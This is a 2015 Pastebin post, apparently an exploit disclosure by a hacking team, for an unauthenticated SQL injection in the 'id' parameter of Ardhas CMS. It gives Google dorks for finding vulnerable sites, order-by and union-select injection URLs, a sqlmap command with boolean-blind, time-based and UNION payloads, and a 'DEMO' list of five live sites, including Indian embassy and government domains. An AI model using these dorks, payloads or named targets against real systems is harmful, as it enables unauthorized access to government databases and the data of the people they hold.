daily pastebin goal
51%
SHARE
TWEET

INDIAN EMBASSY Ardhas CMS - SQL Injection Vulnerability

a guest Oct 27th, 2015 528 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =========================================================
  2. [+] Title                 :- INDIAN EMBASSY Ardhas CMS - SQL INJECTION
  3. [+] Date                  :- 26 - October - 2015
  4. [+] Vendor Homepage       :- http://www.ardhas.com/
  5. [+] Version               :- All Versions
  6. [+] Tested on             :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
  7. [+] Category              :- webapps
  8. [+] Google Dorks          :- "Powered by: Ardhas Technology India Private Limited."
  9.                              "Powered by: Ardhas Technology India Private Limited." inurl:"php?id="
  10.                              "Powered by: Ardhas Technology India Private Limited." +inurl:/.php?id=
  11. [+] Exploit Author        :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
  12. [+] Team name             :- Team Alastor Breeze, Intelligent-Exploit
  13. [+] Official Website      :- serverfarming.com, intelligentexploit.com
  14. [+] The official Members  :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
  15. [+] Greedz to             :- @@lu, Lalit, MyLappy<3, Diksha, DK
  16. [+] Contact               :- indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
  17.  
  18. =========================================================
  19. [+] Severity Level          :- High
  20.  
  21. [+] Request Method(s)       :- GET / POST
  22.  
  23. [+] Vulnerable Parameter(s) :- id
  24.  
  25. [+] Affected Area(s)        :- Entire admin, database, Server
  26.  
  27. [+] About                   :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error
  28.  
  29. [+] SQL vulnerable File     :- /home/DOMAIN/public_html/pages.php
  30.  
  31. [+] POC                     :- http://127.0.0.1/pages.php?id=[SQL]'
  32.  
  33. The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.
  34.  
  35.  
  36. http://www.[WEBSITE].com/pages.php?id=73' order by [SQL IN4JECTION]--+
  37. http://www.[WEBSITE].com/pages.php?id=73' union all select [SQL INJECTION]--+
  38.  
  39.  
  40. SQLMap
  41. ++++++++++++++++++++++++++
  42. python sqlmap.py --url "http://127.0.0.1/pages.php?id=[SQL]" --dbs
  43. ++++++++++++++++++++++++++
  44. ---
  45. Parameter: id (GET)
  46.     Type: boolean-based blind
  47.     Title: AND boolean-based blind - WHERE or HAVING clause
  48.     Payload: id=73' AND 1443=1443 AND 'jAQh'='jAQh
  49.  
  50.     Type: AND/OR time-based blind
  51.     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  52.     Payload: id=73' AND (SELECT * FROM (SELECT(SLEEP(5)))plvi) AND 'AdNh'='AdNh
  53.  
  54.     Type: UNION query
  55.     Title: Generic UNION query (NULL) - 1 column
  56.     Payload: id=-5334' UNION ALL SELECT CONCAT(0x7171786271,0x48674266657370705958,0x717a766a71)--
  57. ---
  58.  
  59.  
  60. [+] DEMO :-   http://www.indianembassy.at/pages.php?id=73'
  61.               https://www.hcisingapore.gov.in/support.php?id=ocp'
  62.               http://www.indembassysuriname.com/pages.php?id=87'
  63.               http://www.cgimunich.com/pages.php?id=35'
  64.               http://www.indianembassy.am/pages.php?id=35'
  65.  
  66.  
  67. =======================================================
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top